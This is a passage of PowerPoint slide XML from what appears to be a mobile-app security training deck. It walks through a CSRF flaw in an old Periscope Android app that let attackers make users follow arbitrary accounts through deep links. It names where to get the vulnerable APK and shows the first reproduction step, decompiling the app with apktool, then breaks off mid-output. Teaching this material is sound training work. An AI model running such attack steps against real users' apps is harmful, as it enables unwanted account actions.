              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> streaming </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>developed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>owned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> by Twitter Inc. It has 50M+ downloads on Google </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Playstore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Prerequisite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> 1 : Install the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> version of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Periscope</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>Download and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>install</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Periscope</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> APK:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/TmmmmmR/mobile-training/blob/master/android/Periscope%20Live%20Video_v1.25.5.93_apkpure.com.apk</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Note</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Periscope</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> has been </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>shutdown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>lately</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>so</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>only</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>see</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>-up of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>exploited</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> issue.</a:t>
            </a:r>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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"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91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400" b="1" dirty="0" err="1"/>
              <a:t>Prerequisite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t> 2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>Create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>Periscope</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>account</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>don't</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> have a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>Periscope</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>will</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>need</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>create</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> one, for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>your</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> Android </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>Device</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>then</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>choose</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> one of the user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>account</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>creation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1"/>
              <a:t>methods</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="16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50F374-C655-4476-9738-D9D0100AAE2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4868695" y="2793929"/>
            <a:ext cx="2103450" cy="3780000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5828F18E-1B7D-41D4-A43A-A835B0304AA5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1957020" y="2784404"/>
            <a:ext cx="2130122" cy="3780000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="857643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pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Issue :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>There </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>was</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> a Cross Site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> in the flow of the application: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>attackers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>could</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> trick </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> to follow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>arbitrarv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>accounts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>without</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>user’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> consent via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Deep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> Links</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Reproducing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> the Attack :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Step</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Procuring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Manifest</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>As </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>so</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>before</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>, the best place to look for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>when</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>we</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>testing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>deed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> links in an application </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the Android </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>Manifest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>apktool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> periscope_1.25.5.93.apk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="18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06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fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Output:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>I: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Using</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Apktool</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 2.4.0 on periscope_1.25.5.93.apk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>I: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Loading</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resource</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> table...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>I: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Decoding</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highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>AndroidManifest.xml</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with</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resources</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>S: WARNING: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Could</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>write</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users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/user/Library/.... </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>instead</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0D0B0D"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
